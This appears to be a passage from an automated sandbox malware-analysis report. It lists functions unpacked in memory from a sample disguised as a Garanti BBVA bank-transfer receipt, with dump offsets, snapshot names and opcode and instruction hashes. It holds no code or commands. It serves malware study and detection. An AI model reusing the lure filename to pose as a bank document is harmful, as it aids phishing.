Instruction Fuzzy Hash: 9331A074E01218DFDB05DFA9D844AEEBBB2FF88300F108069E415AB360DB35A955DF90

Function 06F0DDC1 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57ee0547ec7b5ad137d427d8c1bdeb1fc68b481e988dc32ce0ecf94686223f28
Instruction ID: 3a73befa53dcedc5255b0b1b53ee8fafbfabaedee1c5461d124992bbe877ab0d
Opcode Fuzzy Hash: 57ee0547ec7b5ad137d427d8c1bdeb1fc68b481e988dc32ce0ecf94686223f28
Instruction Fuzzy Hash: EF217C75B002118FEB54EB79D9849AEB7F3AFD860071485A9E506DB3A0DE30DD02DB90

Function 06FB90E8 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 575b658d1ad24d233b148cf0567beb6c69825aba44866c9a244dfa8f1b42a102
Instruction ID: 7494dd3b840fbe93b02d4f73722fc0bb36258202d0e0e95c75001b89bb15a609
Opcode Fuzzy Hash: 575b658d1ad24d233b148cf0567beb6c69825aba44866c9a244dfa8f1b42a102
Instruction Fuzzy Hash: 01214F31A16224CFD7045B79E84D26E7FA6EB8626131485A6F917C72C5DE708C81C7B1

Function 06F0F2F8 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5069baf5206599001d009b3cdd4a9e46dda9bc198cfc455bf49eec79c5bfef32
Instruction ID: 646470f241042ae8f59866a657aaac45cae99cd544873048bb66216622bca7bf
Opcode Fuzzy Hash: 5069baf5206599001d009b3cdd4a9e46dda9bc198cfc455bf49eec79c5bfef32
Instruction Fuzzy Hash: D1216031B111108FE754DF3AD48991A7BEAAF8CB60B1540A9E906CB3B1DF30DC41DBA1

Function 06F0C390 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77024f6d6d8ca009e036471ed8b9f707b762f9a45a1c9e9d2f2e6dc1d3f80bcc
Instruction ID: f0eb6cc37084b638f7ea02a64c2fa56a74ac72161d34fd63da9e1e5bea56d26f
Opcode Fuzzy Hash: 77024f6d6d8ca009e036471ed8b9f707b762f9a45a1c9e9d2f2e6dc1d3f80bcc
Instruction Fuzzy Hash: CE319E35B01205DFDB54DF68D888AAA77F6FF49310B2445A9E816DB3A1CB30EC41DBA0

Function 00C2D1FC Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379229690.0000000000C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c2d000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3be4ae1b8f0cbfbff6e9716bc45b03349388bd61a60cf7204dc021dafbc7d2da
Instruction ID: 0c6a64cf688930d21b47d030dac4c0a66b037e62d233be71c35da1d658481063
Opcode Fuzzy Hash: 3be4ae1b8f0cbfbff6e9716bc45b03349388bd61a60cf7204dc021dafbc7d2da
Instruction Fuzzy Hash: 422100B2504340DFDB05DF50E8C0B2ABB65FB98310F24C5A9E80A0B686C336DC16CBA2

Function 00C2D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379229690.0000000000C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c2d000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bffd5bd288c421379600652afd70789f6cbdbf037848de5985b82fd5ef8126e1
Instruction ID: c2af08617fadd81b983a0538f33b5dad494fb94270c76903607d44fbe726af07
Opcode Fuzzy Hash: bffd5bd288c421379600652afd70789f6cbdbf037848de5985b82fd5ef8126e1
Instruction Fuzzy Hash: 402125B1504240DFDB05DF14E9C0B26BF65FBA8318F34C5B9E80A0B656C376D956CBA2

Function 06FBB89C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67cc07b5171b1bd4bf74bc4ced0bb98659270a5ee8d492040a14ee4e17a79733
Instruction ID: b50e0bb67b26f23c0f579611fbd44c78608f917fbe999458c5a1fbc0d7f66abb
Opcode Fuzzy Hash: 67cc07b5171b1bd4bf74bc4ced0bb98659270a5ee8d492040a14ee4e17a79733
Instruction Fuzzy Hash: 2311383210C3556FEB42AB68DCA17DF7FB5DF46214F088097E480CB1A3E6708456C3A6

Function 06F0F170 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8de587f972086f799c1f055bb2e0ce00321ae24c3c85904dda1e6bdd2eaa8bfe
Instruction ID: 09af40c47766681f27d87bf2378add365ae9be6ae92b8fe09e8f64a5743b4c35
Opcode Fuzzy Hash: 8de587f972086f799c1f055bb2e0ce00321ae24c3c85904dda1e6bdd2eaa8bfe
Instruction Fuzzy Hash: 9F21CF71E02604CFEBA1CF68DA84A6ABBB1FF48310F1580A9D805DB3A1D730ED40DB61

Function 00C3D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379537108.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3d000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 014d96631ae232aea0065fd4ff5e36da8e2b1072678b0a8a9cdec87245be4cc0
Instruction ID: 685f90b4b6f76cefd1ff5943d1dfd737dc46df4aa38d1d7057d3398ee34560ac
Opcode Fuzzy Hash: 014d96631ae232aea0065fd4ff5e36da8e2b1072678b0a8a9cdec87245be4cc0
Instruction Fuzzy Hash: 5D210471514344EFDB05DF10E9C0B26BBA5FB84314F24C5ADE80A4B292C737DC46CA61

Function 00C3D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379537108.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3d000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be3c7c9e94cb44002e24db0e289c3059136782edafd671434f46a61d96b3a54e
Instruction ID: b6c4ea19a13e028394b8d561337436a1e65e149140d9403a4ee2c724892bfc08
Opcode Fuzzy Hash: be3c7c9e94cb44002e24db0e289c3059136782edafd671434f46a61d96b3a54e
Instruction Fuzzy Hash: 1F21F271614344DFDB18DF20E9C0B26BB65FB84714F24C5A9E84A4B296C336D847CA62

Function 06FBD978 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 686ad98116a99e9a66f98b23134f9d35adaeb21581a6d1e82672009a9be866b6
Instruction ID: b2fa62a71cbdee5dfb5a86d459293e69a6125fe548d70ff6e7add53012449ccc
Opcode Fuzzy Hash: 686ad98116a99e9a66f98b23134f9d35adaeb21581a6d1e82672009a9be866b6
Instruction Fuzzy Hash: 04212731B04218DFE3984B26C8157AA736BBFC5701F11902AE1025B296CAB1CC41CB93

Function 06F080D0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a57472730b544da12ad45ec2a64e23cf03a59c93e2a26b80229793f5df406485
Instruction ID: 274ae1551e9031bc75957aae8c3c3ee3e67d9fd8e955625ae4c6687ee19269e0
Opcode Fuzzy Hash: a57472730b544da12ad45ec2a64e23cf03a59c93e2a26b80229793f5df406485
Instruction Fuzzy Hash: 91216A31B001148FDB58EF68D88486EBBE6FF886507108069E916DB3A1DB31EC02DBA0

Function 06FB6779 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3fcafef0611c86e687bf6b9a897c7e0d7cb4eadbc5daa6ed1a5819e9977b591
Instruction ID: 10f989200dcd3d94d628baf498acdfff9195d1d37196fcfd34420baf6a0e20c4
Opcode Fuzzy Hash: d3fcafef0611c86e687bf6b9a897c7e0d7cb4eadbc5daa6ed1a5819e9977b591
Instruction Fuzzy Hash: 1F115531B05321AFC7A0A666DC408FABB96DFC9210700862AE409CFA85DE70DC048BE1

Function 06FB5E09 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6193a3693905c2086220bdb36ddbf58e922fe102bdc5e4619fc93baea168b5b
Instruction ID: a44450d29526563d8f1d225c5d130b0c0391c7023fcaff75b0bdc1c259df49a8
Opcode Fuzzy Hash: b6193a3693905c2086220bdb36ddbf58e922fe102bdc5e4619fc93baea168b5b
Instruction Fuzzy Hash: 14114835B093569FC7655B36A8105BE3FE95B8924070410A6E509CB282DE28C840C7F2

Function 06F0ECC0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84bac6e4c31f134489bacf80f1e5f84e9a8aadb14f1c9df10b835966b295786f
Instruction ID: cba9d49bcd95d878e4671649b64701cf72a0e24ed62a01fa9dea9d8d0b72ee95
Opcode Fuzzy Hash: 84bac6e4c31f134489bacf80f1e5f84e9a8aadb14f1c9df10b835966b295786f
Instruction Fuzzy Hash: 4E11C472B017215FE3A5D669DC40B2BB3DAEBC8660B14453AEA05DB3D0DE71EC0193E0

Function 06FB6788 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a887f62023d814b71a8f826c75f8fae78997c47f931817c5ea7c6d1f647ee284
Instruction ID: 57c78d58f2b4de2e6bda7808cdbbe7fa85e5eab9b6508f7d26ef7421243c73b7
Opcode Fuzzy Hash: a887f62023d814b71a8f826c75f8fae78997c47f931817c5ea7c6d1f647ee284
Instruction Fuzzy Hash: 12110431F142329BD7A4A669DC40ABEB79BEFC86107108639E51ACF784DEB0DC048BD1

Function 06FB936E Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf40589e441d92c0c5b9525a634b3a6d5da19a0396aa3f4f4a77a0c170a95353
Instruction ID: bb0ff9e1ff5f50a949d3ded0e60d721a274afba86f3ef7380efdaccab7675869
Opcode Fuzzy Hash: bf40589e441d92c0c5b9525a634b3a6d5da19a0396aa3f4f4a77a0c170a95353
Instruction Fuzzy Hash: E721C072D08505CBEB608B6AD8423FEB3B4FF02705F0CA52AE66AD51D1D3B4D550C796

Function 06F0CE92 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77dd48df6fec631284aff9bc4939992ea2a4a21f6646c2de77dd4af095ad80cc
Instruction ID: 97c5f17074f3c06791adb071a9cae96b4ed907f64665cae5236dfb8d121136b2
Opcode Fuzzy Hash: 77dd48df6fec631284aff9bc4939992ea2a4a21f6646c2de77dd4af095ad80cc
Instruction Fuzzy Hash: FE1179756013049FD720DF69D884CAABBB6FF893547148A69F916CB391C731EC45CBA0

Function 06F07F60 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15f58f816314184469bd29607fc553fe01207d7dd36500b1c258dd5563afb1c7
Instruction ID: 0b73a166bdd95b6ce0b0b60fba1f027e964a8dd3fd97d8d450e0ba0ddb68d091
Opcode Fuzzy Hash: 15f58f816314184469bd29607fc553fe01207d7dd36500b1c258dd5563afb1c7
Instruction Fuzzy Hash: C6118232F441198BDB64AB65DC587EEBBB6AB88221F140069D516E33E0DFB05C41DBE4

Function 06F09D90 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f63590205c87f6cb5e7b4b1fc8bb6f2ead59eb679840acd3c291a8e495753f86
Instruction ID: d172b338a3dd7143683a101147a96a12379c87f7a539247300935db5003595c9
Opcode Fuzzy Hash: f63590205c87f6cb5e7b4b1fc8bb6f2ead59eb679840acd3c291a8e495753f86
Instruction Fuzzy Hash: B7119D36B402099FC740EF69D80899EBBB2FBC8310B108026E91197390DF309946CBA1

Function 06F0AD72 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d88e49ac6abd651094d869cab484a9fde0eae2a55937847135acd05514e0dcb
Instruction ID: 96ec25fa9e4cc7e6f60971f05af941c2d1b75875365b5a7f4681e378ad134956
Opcode Fuzzy Hash: 8d88e49ac6abd651094d869cab484a9fde0eae2a55937847135acd05514e0dcb
Instruction Fuzzy Hash: 9B214975E11209EFEF05DFA5D944AEDBFB2AF88350F148019E80177291CB319A40EFA1

Function 00C3D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379537108.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3d000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09ad9d79a48a78b43cc7032a8bad4b3d13ae3b963879f18c17aca0491a333880
Instruction ID: 6f9adcf15aafa828d1460f08e775484fd91a25a2b9c15e6dead3401885eb3627
Opcode Fuzzy Hash: 09ad9d79a48a78b43cc7032a8bad4b3d13ae3b963879f18c17aca0491a333880
Instruction Fuzzy Hash: 47218E755093808FCB06CF24D990B15BF71EB46314F28C5EAD8498F6A7C33A980ACB62

Function 06FB93E4 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0bc425632ef4c7c800856be7908aeaf505692898750a397ab472ff06c5d1500
Instruction ID: c8620f26d2c7da1cb0bb545814cac545a095adb3bfdcb4027319b8d4fd83c774
Opcode Fuzzy Hash: a0bc425632ef4c7c800856be7908aeaf505692898750a397ab472ff06c5d1500
Instruction Fuzzy Hash: 9521C372D08505CBEB608B6AD8523FEB3B4FF02705F0CA51AD66AD51D1C3B8D590C756

Function 06F09EA0 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ed0098d4ab80067d0d4b4bbdbcde8dd29867ae9a83ce61c985951f70946e3b3
Instruction ID: cf50773361864e5215f887fc3839b488741f97f880f3ba342fd7bb813717aee7
Opcode Fuzzy Hash: 6ed0098d4ab80067d0d4b4bbdbcde8dd29867ae9a83ce61c985951f70946e3b3
Instruction Fuzzy Hash: 9811A036A006258FDB10DA68E84069EF7A4FB85321F044576D619E7241E770AD15CBE2

Function 06F003E8 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3648c5ce1f1987105c7a20023937913eb52704bde83217365a18ff1ec25d3d0
Instruction ID: 0696f3d6589d615857c27177ed006e3b524392dae762102f36f9da081d54c4fa
Opcode Fuzzy Hash: b3648c5ce1f1987105c7a20023937913eb52704bde83217365a18ff1ec25d3d0
Instruction Fuzzy Hash: AE118E75E016099FDF20DF99D8C4CAEFBBAFF883107148569D915972A2DB30E810CBA0

Function 06F4EE71 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388411612.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f40000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48d46d05a753fa43aba60c4f90b0578540ae04cb30e6a0c990e77ddf53dcfbc4
Instruction ID: 37381969f3f775c2bc24612dce603263687b49035168d46cacf5fd000792b3a2
Opcode Fuzzy Hash: 48d46d05a753fa43aba60c4f90b0578540ae04cb30e6a0c990e77ddf53dcfbc4
Instruction Fuzzy Hash: 9711B2356002459FC701CF28C844DAEBBB6FF89320B14859AE809DB362CB31ED02CBA1

Function 00C2D1F7 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379229690.0000000000C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c2d000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dce05a956da371322a9adc0a0d4b4c51a05561a1f56c2dd05ac87206c169886
Instruction ID: c0a5722da3be5492cd7176c75f47f6c4c74736088102178113a559247dc71d4b
Opcode Fuzzy Hash: 5dce05a956da371322a9adc0a0d4b4c51a05561a1f56c2dd05ac87206c169886
Instruction Fuzzy Hash: 8B21AF76504240DFCB06CF50D9C4B56BF72FB94314F24C5A9DC090B656C33AD966CBA1

Function 06FBD976 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a19aaaa557a95b146627b47bd4d92e5a6fc20349bcc45e395a963e955023144
Instruction ID: 2411d9920205884a8c7fa9bdc0bd00196954b82a0af6b00d2bdc46b405f14e3a
Opcode Fuzzy Hash: 4a19aaaa557a95b146627b47bd4d92e5a6fc20349bcc45e395a963e955023144
Instruction Fuzzy Hash: 26110631F44204DFE3988B16C805BEA7367FFC1701F55906AE1066B29AC6B1C840CB97

Function 06F08190 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fc97717bcb4b602435c8a02491ed852a58a919d25bfd7580ee500267d2e98dd
Instruction ID: 212741ea3eef59fd58da4e08bc4ad449d2d207fbe2f5772ebef6cfe415ae789b
Opcode Fuzzy Hash: 7fc97717bcb4b602435c8a02491ed852a58a919d25bfd7580ee500267d2e98dd
Instruction Fuzzy Hash: 5D1121317003449FE7208B68EC41F967BE5EB85320F00826AF265CB2E2D7B1E806E751

Function 00C2D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379229690.0000000000C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c2d000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
Instruction ID: d2c05da82a191dae76c11b478cd2d8f23d0e481e570a99c909f3c7efc6a157ac
Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
Instruction Fuzzy Hash: 651103B2404280CFCB01CF10D5C0B56BF71FB94318F24C6A9D80A0B656C336D956CBA1

Function 06FB8104 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388540386.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fb0000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b261a3d526d0d766b643f817caf65da7bc8130857864e561d7ef76d8ce39d5c
Instruction ID: 5a5c59761378c898339eef83cfc108ae24ce29bb53c96538a3bc8471c154f6bd
Opcode Fuzzy Hash: 1b261a3d526d0d766b643f817caf65da7bc8130857864e561d7ef76d8ce39d5c
Instruction Fuzzy Hash: 8F2100B68003499FDB10DF9AD884ADEBBF4FB48310F10842AE959A7310C375A954CFA1

Function 06F0B520 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6223639c039bf4f8f4c836f4986123e0251f78ac93407e998ffcfbb35f697ed4
Instruction ID: 039aa5b84d48f0e7f5d1d11bf7e6b74a32cd010c5ddab78784136e1e9a6609dd
Opcode Fuzzy Hash: 6223639c039bf4f8f4c836f4986123e0251f78ac93407e998ffcfbb35f697ed4
Instruction Fuzzy Hash: 9C11AC34B246058FEB54DB78E840B6EB7F6FFC8211F000569E642AB394DB70ED018BA1

Function 06F4F178 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388411612.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f40000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73b1e84fc193eaf0b8184825a39d47d621ed2b85887f03bad8d40d3ad45fef1d
Instruction ID: df8746f9c49f1394aae375f37748cec75dda2f79ca5a4b0fa1995d0c99f65d56
Opcode Fuzzy Hash: 73b1e84fc193eaf0b8184825a39d47d621ed2b85887f03bad8d40d3ad45fef1d
Instruction Fuzzy Hash: DB012C21A1E3B05FD7036B78A8741DE3FA68E8316071944D3D085CF293D9188D4987EA

Function 00C3D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1379537108.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c3d000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
Instruction ID: 5a56c3f8f76a9e8510213447fbddd6739ed2489a8c1ef4470b225381cca440c0
Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
Instruction Fuzzy Hash: 2E118B75504280DFCB16CF50D5C4B16BBA1FB84314F28C6AAD84A4B696C33BD95ACB61

Function 06F0ECAF Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1388239711.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f00000_dekont garanti bbva_Ba#U015fka Bankaya Transfer 01112 img .jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ef7ba4969c0b00af285b5de342546a37bf0b519390f585117218211e94e42a5
